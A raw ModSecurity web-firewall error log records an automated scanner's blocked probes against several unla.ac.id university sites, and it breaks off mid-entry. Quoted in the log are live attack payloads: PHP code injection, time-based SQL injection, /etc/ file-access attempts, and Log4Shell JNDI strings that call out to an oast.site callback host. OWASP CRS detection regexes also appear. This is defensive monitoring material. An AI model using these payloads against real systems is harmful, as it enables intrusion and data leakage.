[Tue Aug 29 11:30:42.329362 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10csCo-f0AAAPiBhwAAAAB"]
[Tue Aug 29 11:30:42.468123 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10csCo-f0AAAPXAo8AAAAi"]
[Tue Aug 29 11:30:42.534041 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPDnzsAAAAP"]
[Tue Aug 29 11:30:42.583468 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPv-GQAAAAM"]
[Tue Aug 29 11:30:42.592248 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOKNpYAAAAK"]
[Tue Aug 29 11:30:42.607137 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOOuYYAAAAW"]
[Tue Aug 29 11:30:42.620260 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAOH4VsAAAAH"]
[Tue Aug 29 11:30:43.304420 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPyOFQAAAAR"]
[Tue Aug 29 11:30:43.304533 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPv-GUAAAAM"]
[Tue Aug 29 11:30:43.308321 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAOOuYgAAAAW"]
[Tue Aug 29 11:30:43.308679 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgz5d7zdmdowob9.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAOH4VwAAAAH"]
[Tue Aug 29 11:30:43.313694 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPiBh8AAAAB"]
[Tue Aug 29 11:30:43.394935 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgjzgrc31fa1udy.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAOH4V0AAAAH"]
[Tue Aug 29 11:30:43.395599 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlg6qdir8fqr9s7u.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPiBiAAAAAB"]
[Tue Aug 29 11:30:43.395889 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlg7bdzygskkr71z.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPQkgYAAAAe"]
[Tue Aug 29 11:30:43.456994 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPRNb0AAAAf"]
[Tue Aug 29 11:30:43.502274 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgc5gy6bjx65z6o.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPv-GgAAAAM"]
[Tue Aug 29 11:30:43.583952 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10c8Co-f0AAAPXApkAAAAi"]
[Tue Aug 29 11:30:44.346807 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPyOFsAAAAR"]
[Tue Aug 29 11:30:44.381730 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgnhma8chasmrxd.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10dMCo-f0AAAPv-GwAAAAM"]
[Tue Aug 29 11:30:44.418505 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPOhaQAAAAa"]
[Tue Aug 29 11:30:44.421619 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPXApwAAAAi"]
[Tue Aug 29 11:30:44.423865 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPiBiUAAAAB"]
[Tue Aug 29 11:30:44.436654 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAO877wAAAAF"]
[Tue Aug 29 11:30:45.321100 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10dcCo-f0AAAPyOF4AAAAR"]
[Tue Aug 29 11:30:45.324885 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPmhNQAAAAV"]
[Tue Aug 29 11:30:45.344966 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPQkg4AAAAe"]
[Tue Aug 29 11:30:45.352263 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPxBTsAAAAS"]
[Tue Aug 29 11:30:45.409965 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAOM4YcAAAAU"]
[Tue Aug 29 11:30:45.421091 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 